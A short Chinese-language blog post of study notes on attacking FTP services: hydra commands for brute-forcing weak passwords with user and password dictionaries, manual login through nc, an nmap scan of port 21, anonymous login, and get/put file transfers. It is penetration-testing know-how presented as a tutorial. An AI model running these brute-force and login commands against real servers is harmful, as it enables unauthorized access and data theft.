FTP漏洞利用

4 0 0

参考资料：
https://www.cnblogs.com/renhaoblog/p/13065978.html
https://www.jianshu.com/p/9498ccf62348

ftp弱口令爆破

1.hydra

hydra -l user -p root ftp://192.168.0.1
-l指定账号是user -p指定账号是root
hydra targetIP ftp -L users.txt -P pass.txt -V
targetIP是目标服务器的IP地址
ftp 是协议
-L 指定一个帐号字典
-l 指定用户
-P 指定一个密码字典
-p 指定密码
-V 现实爆破测试的详细过程
-f 成功爆破一个账号就停止爆破

nc 192.168.2.132 21
USER [用户名]
PASS [密码]
PWD //显示当前工作目录
SYST //返回服务器使用的操作系统
HELP //帮助信息
FTP漏洞利用

2.ftp匿名用户登录

nmap -p 21 10.0.2.5

PORT STATE SERVICE
21/tcp open ftp
FTP漏洞利用

登录FTP后可以使用的命令
https://www.cnblogs.com/bevis-jiang/archive/2011/11/29/2267588.html
https://blog.csdn.net/bestone0213/article/details/41892921

进一步利用
https://blog.csdn.net/qq_39004632/article/details/89327182

1.上传下载文件

ftp> get 文件名 //下载(也可以在前面Windows的浏览器里直接下载)
ftp> put 文件路径文件名 //上传

__EOF__

FTP漏洞利用
本文作者： aliex 本文链接： https://www.cnblogs.com/aliex/articles/18321332 关于博主： 评论和私信会在第一时间回复。或者直接私信我。 版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！ 声援博主： 如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。

# 随笔